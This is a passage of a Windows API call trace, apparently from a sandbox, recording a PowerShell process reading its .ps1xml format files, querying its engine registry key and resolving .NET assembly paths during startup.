	[0111.383] ReadFile (in: hFile=0x330, lpBuffer=0x33bcf20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33bcf20*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.383] ReadFile (in: hFile=0x330, lpBuffer=0x33bcf20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33bcf20*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.383] ReadFile (in: hFile=0x330, lpBuffer=0x33bcf20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33bcf20*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.383] ReadFile (in: hFile=0x330, lpBuffer=0x33bcf20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33bcf20*, lpNumberOfBytesRead=0xccf58*=0x9e2, lpOverlapped=0x0) returned 1
	[0111.384] ReadFile (in: hFile=0x330, lpBuffer=0x33bc46a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33bc46a*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0111.384] ReadFile (in: hFile=0x330, lpBuffer=0x33bcf20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33bcf20*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0111.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xccca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0111.384] SetErrorMode (uMode=0x1) returned 0x1
	[0111.384] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccf00 | out: lpFileInformation=0xccf00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0111.384] SetErrorMode (uMode=0x1) returned 0x1
	[0111.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0111.384] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x330) returned 0x0
	[0111.384] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf6c, lpData=0x0, lpcbData=0xccf68*=0x0 | out: lpType=0xccf6c*=0x1, lpData=0x0, lpcbData=0xccf68*=0x56) returned 0x0
	[0111.384] CoTaskMemAlloc (cb=0x5a) returned 0x1ae2d0
	[0111.385] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf3c, lpData=0x1ae2d0, lpcbData=0xccf38*=0x56 | out: lpType=0xccf3c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccf38*=0x56) returned 0x0
	[0111.385] CoTaskMemFree (pv=0x1ae2d0) 
	[0111.385] RegCloseKey (hKey=0x330) returned 0x0
	[0111.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0111.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xccae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0111.386] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x90444ce6, Data2=0xa6d9, Data3=0x4857, Data4=([0]=0x9a, [1]=0xba, [2]=0xc9, [3]=0x0, [4]=0x37, [5]=0x54, [6]=0xd9, [7]=0xba))) returned 0x0
	[0111.387] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x4c67d018, Data2=0x971a, Data3=0x4f9d, Data4=([0]=0xa7, [1]=0x8e, [2]=0x56, [3]=0xa5, [4]=0x29, [5]=0x30, [6]=0xb4, [7]=0x4c))) returned 0x0
	[0111.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0111.388] SetErrorMode (uMode=0x1) returned 0x1
	[0111.388] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0111.388] GetFileType (hFile=0x330) returned 0x1
	[0111.388] SetErrorMode (uMode=0x1) returned 0x1
	[0111.388] GetFileType (hFile=0x330) returned 0x1
	[0111.389] ReadFile (in: hFile=0x330, lpBuffer=0x33e7a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33e7a88*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.390] ReadFile (in: hFile=0x330, lpBuffer=0x33e7a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33e7a88*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.390] ReadFile (in: hFile=0x330, lpBuffer=0x33e7a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33e7a88*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.391] ReadFile (in: hFile=0x330, lpBuffer=0x33e7a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33e7a88*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.391] ReadFile (in: hFile=0x330, lpBuffer=0x33e7a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33e7a88*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.392] ReadFile (in: hFile=0x330, lpBuffer=0x33e7a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33e7a88*, lpNumberOfBytesRead=0xccf58*=0xfb2, lpOverlapped=0x0) returned 1
	[0111.392] ReadFile (in: hFile=0x330, lpBuffer=0x33e71a2, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33e71a2*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0111.392] ReadFile (in: hFile=0x330, lpBuffer=0x33e7a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33e7a88*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0111.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0111.393] SetErrorMode (uMode=0x1) returned 0x1
	[0111.393] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccf00 | out: lpFileInformation=0xccf00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0111.393] SetErrorMode (uMode=0x1) returned 0x1
	[0111.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0111.393] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x330) returned 0x0
	[0111.393] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf6c, lpData=0x0, lpcbData=0xccf68*=0x0 | out: lpType=0xccf6c*=0x1, lpData=0x0, lpcbData=0xccf68*=0x56) returned 0x0
	[0111.393] CoTaskMemAlloc (cb=0x5a) returned 0x1b851620
	[0111.393] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf3c, lpData=0x1b851620, lpcbData=0xccf38*=0x56 | out: lpType=0xccf3c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccf38*=0x56) returned 0x0
	[0111.394] CoTaskMemFree (pv=0x1b851620) 
	[0111.394] RegCloseKey (hKey=0x330) returned 0x0
	[0111.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0111.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0111.395] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xccb7e7ea, Data2=0x930e, Data3=0x42b7, Data4=([0]=0xb9, [1]=0x8a, [2]=0xb1, [3]=0x1d, [4]=0x7e, [5]=0xa4, [6]=0xcf, [7]=0x8e))) returned 0x0
	[0111.396] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xabd83e4, Data2=0x5fde, Data3=0x4a4d, Data4=([0]=0x82, [1]=0x6a, [2]=0xc3, [3]=0x54, [4]=0xd9, [5]=0x16, [6]=0xad, [7]=0xa4))) returned 0x0
	[0111.396] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xdfa7a077, Data2=0xe648, Data3=0x410d, Data4=([0]=0x9c, [1]=0x23, [2]=0xfb, [3]=0xa8, [4]=0xd6, [5]=0x3b, [6]=0x45, [7]=0x89))) returned 0x0
	[0111.396] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xa4bcc08f, Data2=0x314b, Data3=0x4ad1, Data4=([0]=0xa7, [1]=0x4, [2]=0xec, [3]=0xa, [4]=0x30, [5]=0x87, [6]=0x62, [7]=0xa8))) returned 0x0
	[0111.396] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xbc36ad96, Data2=0xc781, Data3=0x4493, Data4=([0]=0x90, [1]=0x2e, [2]=0xfe, [3]=0x91, [4]=0x23, [5]=0xf3, [6]=0xf6, [7]=0xeb))) returned 0x0
	[0111.397] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x11790b4c, Data2=0x8a6b, Data3=0x4995, Data4=([0]=0xbd, [1]=0xd8, [2]=0x44, [3]=0x55, [4]=0xcb, [5]=0x2e, [6]=0x4e, [7]=0xd5))) returned 0x0
	[0111.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0111.397] SetErrorMode (uMode=0x1) returned 0x1
	[0111.397] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0111.397] GetFileType (hFile=0x330) returned 0x1
	[0111.397] SetErrorMode (uMode=0x1) returned 0x1
	[0111.397] GetFileType (hFile=0x330) returned 0x1
	[0111.398] ReadFile (in: hFile=0x330, lpBuffer=0x34337e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34337e8*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.399] ReadFile (in: hFile=0x330, lpBuffer=0x34337e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34337e8*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.399] ReadFile (in: hFile=0x330, lpBuffer=0x34337e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34337e8*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.399] ReadFile (in: hFile=0x330, lpBuffer=0x34337e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34337e8*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.400] ReadFile (in: hFile=0x330, lpBuffer=0x34337e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34337e8*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.401] ReadFile (in: hFile=0x330, lpBuffer=0x34337e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34337e8*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.401] ReadFile (in: hFile=0x330, lpBuffer=0x34337e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34337e8*, lpNumberOfBytesRead=0xccf58*=0xaca, lpOverlapped=0x0) returned 1
	[0111.401] ReadFile (in: hFile=0x330, lpBuffer=0x3432e1a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3432e1a*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0111.401] ReadFile (in: hFile=0x330, lpBuffer=0x34337e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x34337e8*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0111.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0111.401] SetErrorMode (uMode=0x1) returned 0x1
	[0111.401] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccf00 | out: lpFileInformation=0xccf00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0111.401] SetErrorMode (uMode=0x1) returned 0x1
	[0111.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0111.402] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x330) returned 0x0
	[0111.402] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf6c, lpData=0x0, lpcbData=0xccf68*=0x0 | out: lpType=0xccf6c*=0x1, lpData=0x0, lpcbData=0xccf68*=0x56) returned 0x0
	[0111.402] CoTaskMemAlloc (cb=0x5a) returned 0x1b851620
	[0111.402] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf3c, lpData=0x1b851620, lpcbData=0xccf38*=0x56 | out: lpType=0xccf3c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccf38*=0x56) returned 0x0
	[0111.402] CoTaskMemFree (pv=0x1b851620) 
	[0111.402] RegCloseKey (hKey=0x330) returned 0x0
	[0111.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0111.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0111.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0111.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0111.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0111.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0111.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0111.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0111.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0111.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0111.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0111.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0111.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0111.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0111.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0111.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0111.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0111.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0111.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0111.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
